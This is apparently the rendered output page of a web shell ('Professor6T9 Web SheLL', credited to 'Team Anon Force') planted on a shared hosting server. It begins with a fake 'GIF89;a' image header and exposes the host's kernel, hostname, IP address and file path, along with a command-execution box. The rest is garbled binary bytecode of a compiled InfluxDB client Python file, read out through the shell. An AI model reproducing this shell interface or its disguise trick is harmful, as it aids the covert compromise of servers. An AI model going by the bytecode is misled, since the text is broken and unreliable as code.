GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
histogram_view_properties.cpython-38.pyc
U ܒi�= � @ s4 d Z ddlZddlZddlmZ G dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � N)�ViewPropertiesc @ s. e Zd ZdZddddddddddddddd dd �Zddd dddddddddddddd �ZdXdd�Zedd� �Zej d d� �Zed!d"� �Z e j d#d"� �Z ed$d%� �Zej d&d%� �Zed'd(� �Zej d)d(� �Zed*d+� �Z e j d,d+� �Z ed-d.� �Zej d/d.� �Zed0d1� �Zej d2d1� �Zed3d4� �Zej d5d4� �Zed6d7� �Zej d8d7� �Zed9d:� �Zej d;d:� �Zed<d=� �Zej d>d=� �Zed?d@� �Zej dAd@� �ZedBdC� �Zej dDdC� �ZedEdF� �Zej dGdF� �ZedHdI� �Zej dJdI� �ZedKdL� �Zej dMdL� �ZdNdO� ZdPdQ� ZdRdS� ZdTdU� ZdVdW� ZdS )Y�HistogramViewPropertiesz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �strzlist[DashboardQuery]zlist[DashboardColor]�boolz list[str]zlist[float]�int�float)�type�queries�colors�shape�note�show_note_when_empty�x_column�fill_columns�x_domain�x_axis_label�position� bin_count�legend_colorize_rows�legend_hide�legend_opacity�legend_orientation_thresholdr r r r r ZshowNoteWhenEmptyZxColumnZfillColumnsZxDomainZ xAxisLabelr ZbinCountZlegendColorizeRowsZ legendHideZ legendOpacityZlegendOrientationThresholdNc C s� t �| � d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _d| _d| _d| _d| _|| _|| _|| _|| _|| _|| _|| _|| _| | _| | _|| _|| _| dk r�| | _|dk r�|| _ |dk r�|| _!|dk r�|| _"dS )z5HistogramViewProperties - a model defined in OpenAPI.N)#r �__init__�_type�_queries�_colors�_shape�_note�_show_note_when_empty� _x_column� _fill_columns� _x_domain� _x_axis_label� _position� _bin_count�_legend_colorize_rows�_legend_hide�_legend_opacity�_legend_orientation_thresholdZ discriminatorr r r r r r r r r r r r r r r r )�selfr r r r r r r r r r r r r r r r � r* �a/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/histogram_view_properties.pyr H sL z HistogramViewProperties.__init__c C s | j S )z�Get the type of this HistogramViewProperties. :return: The type of this HistogramViewProperties. :rtype: str )r �r) r* r* r+ r s s zHistogramViewProperties.typec C s |dkrt d��|| _dS )z�Set the type of this HistogramViewProperties. :param type: The type of this HistogramViewProperties. :type: str Nz,Invalid value for `type`, must not be `None`)� ValueErrorr )r) r r* r* r+ r | s c C s | j S )z�Get the queries of this HistogramViewProperties. :return: The queries of this HistogramViewProperties. :rtype: list[DashboardQuery] )r r, r* r* r+ r � s zHistogramViewProperties.queriesc C s |dkrt d��|| _dS )z�Set the queries of this HistogramViewProperties. :param queries: The queries of this HistogramViewProperties. :type: list[DashboardQuery] Nz/Invalid value for `queries`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the colors of this HistogramViewProperties. Colors define color encoding of data into a visualization :return: The colors of this HistogramViewProperties. :rtype: list[DashboardColor] )r r, r* r* r+ r � s zHistogramViewProperties.colorsc C s |dkrt d��|| _dS )z�Set the colors of this HistogramViewProperties. Colors define color encoding of data into a visualization :param colors: The colors of this HistogramViewProperties. :type: list[DashboardColor] Nz.Invalid value for `colors`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the shape of this HistogramViewProperties. :return: The shape of this HistogramViewProperties. :rtype: str )r r, r* r* r+ r � s zHistogramViewProperties.shapec C s |dkrt d��|| _dS )z�Set the shape of this HistogramViewProperties. :param shape: The shape of this HistogramViewProperties. :type: str Nz-Invalid value for `shape`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the note of this HistogramViewProperties. :return: The note of this HistogramViewProperties. :rtype: str )r r, r* r* r+ r � s zHistogramViewProperties.notec C s |dkrt d��|| _dS )z�Set the note of this HistogramViewProperties. :param note: The note of this HistogramViewProperties. :type: str Nz,Invalid value for `note`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the show_note_when_empty of this HistogramViewProperties. If true, will display note when empty :return: The show_note_when_empty of this HistogramViewProperties. :rtype: bool )r r, r* r* r+ r � s z,HistogramViewProperties.show_note_when_emptyc C s |dkrt d��|| _dS )z�Set the show_note_when_empty of this HistogramViewProperties. If true, will display note when empty :param show_note_when_empty: The show_note_when_empty of this HistogramViewProperties. :type: bool Nz<Invalid value for `show_note_when_empty`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the x_column of this HistogramViewProperties. :return: The x_column of this HistogramViewProperties. :rtype: str )r r, r* r* r+ r � s z HistogramViewProperties.x_columnc C s |dkrt d��|| _dS )z�Set the x_column of this HistogramViewProperties. :param x_column: The x_column of this HistogramViewProperties. :type: str Nz0Invalid value for `x_column`, must not be `None`)r- r )r) r r* r* r+ r � s c C s | j S )z�Get the fill_columns of this HistogramViewProperties. :return: The fill_columns of this HistogramViewProperties. :rtype: list[str] )r r, r* r* r+ r s z$HistogramViewProperties.fill_columnsc C s |dkrt d��|| _dS )z�Set the fill_columns of this HistogramViewProperties. :param fill_columns: The fill_columns of this HistogramViewProperties. :type: list[str] Nz4Invalid value for `fill_columns`, must not be `None`)r- r )r) r r* r* r+ r s c C s | j S )z�Get the x_domain of this HistogramViewProperties. :return: The x_domain of this HistogramViewProperties. :rtype: list[float] )r! r, r* r* r+ r s z HistogramViewProperties.x_domainc C s |dkrt d��|| _dS )z�Set the x_domain of this HistogramViewProperties. :param x_domain: The x_domain of this HistogramViewProperties. :type: list[float] Nz0Invalid value for `x_domain`, must not be `None`)r- r! )r) r r* r* r+ r $ s c C s | j S )z�Get the x_axis_label of this HistogramViewProperties. :return: The x_axis_label of this HistogramViewProperties. :rtype: str )r"